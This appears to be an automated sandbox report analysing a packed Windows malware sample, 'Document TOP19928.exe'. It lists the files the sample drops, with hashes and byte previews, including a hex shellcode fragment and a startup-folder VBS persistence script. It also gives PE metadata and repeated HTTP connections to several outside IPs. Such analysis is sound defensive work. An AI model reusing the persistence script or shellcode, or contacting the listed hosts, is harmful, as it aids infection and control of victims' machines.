Preview:	yku..UAXVi..L....S6...V;...V10DEZRDXCZS53410U3UAXV10DEZRD.CZS;,.?0.:.`.W}.e.2;7x3(<RAU\.6R;/7".R!e('x4sq\|g.]:W0oU[;.DEZRDXC#R<..QW..5&.kQW._...b#=./....5T.[....$"..-;+g3R.410U3UAX.t0D.[SD.+..53410U3U.XT0;ENZRT\CZS53410U.@AXV!0DEzVDXC.S5#410W3UGXV10DEZTDXCZS534.4U3WAXV10DGZ..XCJS5#410U#UAHV10DEZBDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZ\|0=;.S53.>4U3EAXV!4DEJRDXCZS53410U3UaXVQ0DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV1

C:\Users\user\AppData\Local\Temp\autD78B.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9844
Entropy (8bit):	7.599742378321997
Encrypted:	false
SSDEEP:	192:6ZxWQa8J2TwDz0kOZ1KDS0Cg1KjfAhG4ffnMHSoZQU/rvQ:6Zx3a8kw1DSv4Zfn0tbc
MD5:	4B7E1DCC3CC5A5343F752A8D9925273C
SHA1:	51D6E810DCB96012FA521E3957C01A0B71C02143
SHA-256:	6318DE88570797F7807698349DB7B586888383C7D4483E434945735C504504D8
SHA-512:	0F66ED9CCA00065A63F1ED95C22AF3DB52D84D7B74E4A73ADA2B1FC5AFDF8D90527597CC57758D57BF2BA0CB4D4878F4EBBAB96358DEA9136CC9A7EB55727561
Malicious:	false
Preview:	EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b

C:\Users\user\AppData\Local\Temp\piceworth

Download File

Process:	C:\Users\user\Desktop\Document TOP19928.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993965996174853
Encrypted:	true
SSDEEP:	6144:KU3g3tFofWt0fbRs0xFxC2g9HZDmQaRT5OYHNB:utFaWCFxehCFbtB
MD5:	FECCB4610CCE73E905531D9AF57586D0
SHA1:	386D190E3B557FC1D868A3838B4DBD8D21F59DA4
SHA-256:	D1D26CFBBF413C9CF6E963E4E981292C6DC90439CE5A9CDB8320D313B7128554
SHA-512:	9B660950902C6ECA10F3E681622D08DD175A1B551158C5FDF986F552F11D463A3C3EEAB1A3A642BC42A3C992B22671954FA86778A6923444D86B393C06C2C7E4
Malicious:	false
Preview:	yku..UAXVi..L....S6...V;...V10DEZRDXCZS53410U3UAXV10DEZRD.CZS;,.?0.:.`.W}.e.2;7x3(<RAU\.6R;/7".R!e('x4sq\|g.]:W0oU[;.DEZRDXC#R<..QW..5&.kQW._...b#=./....5T.[....$"..-;+g3R.410U3UAX.t0D.[SD.+..53410U3U.XT0;ENZRT\CZS53410U.@AXV!0DEzVDXC.S5#410W3UGXV10DEZTDXCZS534.4U3WAXV10DGZ..XCJS5#410U#UAHV10DEZBDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZ\|0=;.S53.>4U3EAXV!4DEJRDXCZS53410U3UaXVQ0DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV1

C:\Users\user\AppData\Local\Temp\unhelpable

Download File

Process:	C:\Users\user\Desktop\Document TOP19928.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	dropped
Size (bytes):	28756
Entropy (8bit):	3.595512151244532
Encrypted:	false
SSDEEP:	768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IKUr4vfF3if6gyTal:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RZ
MD5:	7FE0EB76B9893497208364C9BCA4921C
SHA1:	C05229A28148FB554231579986E4F541230FC2FD
SHA-256:	5F69228EA044DFEF0F9C87472AEA8EC674E479CFE97C43B82E2E839C1405D8FF
SHA-512:	5D3715B7D11704648984582FF23A61A92507BC0F1D52FCDDB5743AD123557A02AFECC4F3C33FCFD7F954143FB6285496C511647CAC9A72FE898F9A6C06944EE1
Malicious:	false
Preview:	A9E499CD8C02898115CEA73647257D6D456782227821727D946E9B8E916AF2AC47BE395D80BBCF6E100x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\Desktop\Document TOP19928.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	752128
Entropy (8bit):	7.952480218907364
Encrypted:	false
SSDEEP:	12288:/YV6MorX7qzuC3QHO9FQVHPF51jgcpqKnggkmgO/6Px1rv/DWWVVS5TwckDSn8vA:MBXu9HGaVHMgg5vO/6Pf7eE5+n8vk04
MD5:	9503C5E38CC3212777D0F35AD86AD949
SHA1:	91E513F38310EC35B6568AB78DB72E07BAAC8E80
SHA-256:	76E1F3E24E580448102173C64147B51E13834FBA66C34ED3E273E5B54C895FE5
SHA-512:	1809FB44509578516DBE4B8BE920309F86DB2FD295C3D040387F0F0A7139AD6F0EB62B828A4383D881F78453136D2E2F982E71200617FE87F842F62C29D5D24D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....xf.........."......p... ... .......0........@.......................................@...@.......@.........................$...........................<...........................................H...........................................UPX0..... ..............................UPX1.....p...0...d..................@....rsrc.... ...........h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	270
Entropy (8bit):	3.4297698362729916
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
MD5:	3DA73F5D6073C0D8F7B9CEE8DF5035A7
SHA1:	D4B44315FD7C6171A9CC03899A00E593AE78CDE7
SHA-256:	1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
SHA-512:	CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.952480218907364
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Document TOP19928.exe
File size:	752'128 bytes
MD5:	9503c5e38cc3212777d0f35ad86ad949
SHA1:	91e513f38310ec35b6568ab78db72e07baac8e80
SHA256:	76e1f3e24e580448102173c64147b51e13834fba66c34ed3e273e5b54c895fe5
SHA512:	1809fb44509578516dbe4b8be920309f86db2fd295c3d040387f0f0a7139ad6f0eb62b828a4383d881f78453136d2e2f982e71200617fe87f842f62c29d5d24d
SSDEEP:	12288:/YV6MorX7qzuC3QHO9FQVHPF51jgcpqKnggkmgO/6Px1rv/DWWVVS5TwckDSn8vA:MBXu9HGaVHMgg5vO/6Pf7eE5+n8vk04
TLSH:	16F423825BC1DD7AC1162772C43ACC689865B8B6CEC83FAD4786F61DF0367D2D84252B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x5390a0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6678BE81 [Mon Jun 24 00:32:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fc6683d30d9f25244a50fd5357825e79

Entrypoint Preview

Instruction
pushad
mov esi, 004E3000h
lea edi, dword ptr [esi-000E2000h]
push edi
jmp 00007F1AD0BF800Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F1AD0BF7FEFh
mov eax, 00000001h
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F1AD0BF800Dh
jne 00007F1AD0BF802Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F1AD0BF8021h
dec eax
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F1AD0BF7FD6h
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F1AD0BF8054h
xor ecx, ecx
sub eax, 03h
jc 00007F1AD0BF8013h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F1AD0BF8077h
sar eax, 1
mov ebp, eax
jmp 00007F1AD0BF800Dh
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F1AD0BF7FCEh
inc ecx
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F1AD0BF7FC0h
add ebx, ebx
jne 00007F1AD0BF8009h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F1AD0BF7FF1h
jne 00007F1AD0BF800Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F1AD0BF7FE6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F1AD0BF8010h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19ac18	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13a000	0x60c18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x19b03c	0xc	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x139284	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xe2000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xe3000	0x57000	0x56400	e543ea0efc24bb8e8f4fea4dcbe870b1	False	0.9873782835144927	data	7.935568274858809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13a000	0x62000	0x61200	9edc8f55d2d0d958751e4be8ddfa6359	False	0.9472228925353925	data	7.934226028980413	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x13a5ac	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x13a6d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x13a804	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x13a930	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0x13ac1c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0x13ad48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0x13bbf4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0x13c4a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0x13ca0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0x13efb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0x140064	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	empty	English	Great Britain	0
RT_STRING	0xce4f0	0x594	empty	English	Great Britain	0
RT_STRING	0xcea84	0x68a	empty	English	Great Britain	0
RT_STRING	0xcf110	0x490	empty	English	Great Britain	0
RT_STRING	0xcf5a0	0x5fc	empty	English	Great Britain	0
RT_STRING	0xcfb9c	0x65c	empty	English	Great Britain	0
RT_STRING	0xd01f8	0x466	empty	English	Great Britain	0
RT_STRING	0xd0660	0x158	empty	English	Great Britain	0
RT_RCDATA	0x1404d0	0x5a1ae	data			1.00032785108516
RT_GROUP_ICON	0x19a684	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x19a700	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x19a718	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x19a730	0x14	data	English	Great Britain	1.25
RT_VERSION	0x19a748	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x19a828	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 26, 2024 14:55:23.556123972 CEST	65213	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:55:23.561003923 CEST	80	65213	154.215.72.110	192.168.2.5
Jun 26, 2024 14:55:23.561120987 CEST	65213	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:55:23.564460993 CEST	65213	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:55:23.569271088 CEST	80	65213	154.215.72.110	192.168.2.5
Jun 26, 2024 14:55:24.472089052 CEST	80	65213	154.215.72.110	192.168.2.5
Jun 26, 2024 14:55:24.472544909 CEST	80	65213	154.215.72.110	192.168.2.5
Jun 26, 2024 14:55:24.472623110 CEST	65213	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:55:24.474962950 CEST	65213	80	192.168.2.5	154.215.72.110
Jun 26, 2024 14:55:24.479790926 CEST	80	65213	154.215.72.110	192.168.2.5
Jun 26, 2024 14:55:39.803683996 CEST	65214	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:39.808799982 CEST	80	65214	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:39.808895111 CEST	65214	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:39.810820103 CEST	65214	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:39.816040993 CEST	80	65214	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:40.763247013 CEST	80	65214	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:40.763304949 CEST	80	65214	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:40.763386965 CEST	65214	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:41.367671967 CEST	65214	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:42.376281977 CEST	65215	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:42.518537998 CEST	80	65215	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:42.519954920 CEST	65215	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:42.522666931 CEST	65215	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:42.527553082 CEST	80	65215	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:43.354536057 CEST	80	65215	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:43.354578972 CEST	80	65215	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:43.354769945 CEST	65215	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:44.028330088 CEST	65215	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:45.046386957 CEST	65216	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:45.051449060 CEST	80	65216	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:45.051640034 CEST	65216	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:45.053260088 CEST	65216	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:45.058162928 CEST	80	65216	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:45.058219910 CEST	80	65216	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:45.831783056 CEST	80	65216	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:45.831845045 CEST	80	65216	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:45.831903934 CEST	65216	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:46.559685946 CEST	65216	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:47.578444004 CEST	65217	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:47.583525896 CEST	80	65217	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:47.583739042 CEST	65217	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:47.585500002 CEST	65217	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:47.590405941 CEST	80	65217	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:48.360296011 CEST	80	65217	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:48.360428095 CEST	80	65217	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:48.361079931 CEST	65217	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:48.363073111 CEST	65217	80	192.168.2.5	202.172.28.202
Jun 26, 2024 14:55:48.367870092 CEST	80	65217	202.172.28.202	192.168.2.5
Jun 26, 2024 14:55:53.579729080 CEST	65219	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:53.584670067 CEST	80	65219	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:53.584750891 CEST	65219	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:53.586302042 CEST	65219	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:53.591172934 CEST	80	65219	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:54.466495037 CEST	80	65219	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:54.466742992 CEST	80	65219	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:54.466815948 CEST	65219	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:55.090821981 CEST	65219	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:56.114950895 CEST	65220	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:56.120471001 CEST	80	65220	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:56.120666027 CEST	65220	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:56.122221947 CEST	65220	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:56.147353888 CEST	80	65220	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:57.062661886 CEST	80	65220	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:57.063010931 CEST	80	65220	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:57.063105106 CEST	65220	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:57.637923956 CEST	65220	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:58.656076908 CEST	65221	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:58.661063910 CEST	80	65221	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:58.661156893 CEST	65221	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:58.663039923 CEST	65221	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:55:58.669286013 CEST	80	65221	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:58.669317961 CEST	80	65221	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:59.544312954 CEST	80	65221	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:59.544389009 CEST	80	65221	116.50.37.244	192.168.2.5
Jun 26, 2024 14:55:59.544466019 CEST	65221	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:00.168987989 CEST	65221	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:01.186975956 CEST	65222	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:01.191842079 CEST	80	65222	116.50.37.244	192.168.2.5
Jun 26, 2024 14:56:01.191936016 CEST	65222	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:01.194468975 CEST	65222	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:01.199270964 CEST	80	65222	116.50.37.244	192.168.2.5
Jun 26, 2024 14:56:02.081085920 CEST	80	65222	116.50.37.244	192.168.2.5
Jun 26, 2024 14:56:02.081157923 CEST	80	65222	116.50.37.244	192.168.2.5
Jun 26, 2024 14:56:02.081281900 CEST	65222	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:02.087081909 CEST	65222	80	192.168.2.5	116.50.37.244
Jun 26, 2024 14:56:02.091905117 CEST	80	65222	116.50.37.244	192.168.2.5
Jun 26, 2024 14:56:07.243916988 CEST	65223	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:07.250761986 CEST	80	65223	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:07.250849009 CEST	65223	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:07.252346992 CEST	65223	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:07.259020090 CEST	80	65223	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:07.872384071 CEST	80	65223	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:07.872442007 CEST	80	65223	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:07.872510910 CEST	65223	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:08.762852907 CEST	65223	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:09.780941963 CEST	65224	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:09.787580013 CEST	80	65224	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:09.787688971 CEST	65224	80	192.168.2.5	46.30.213.191
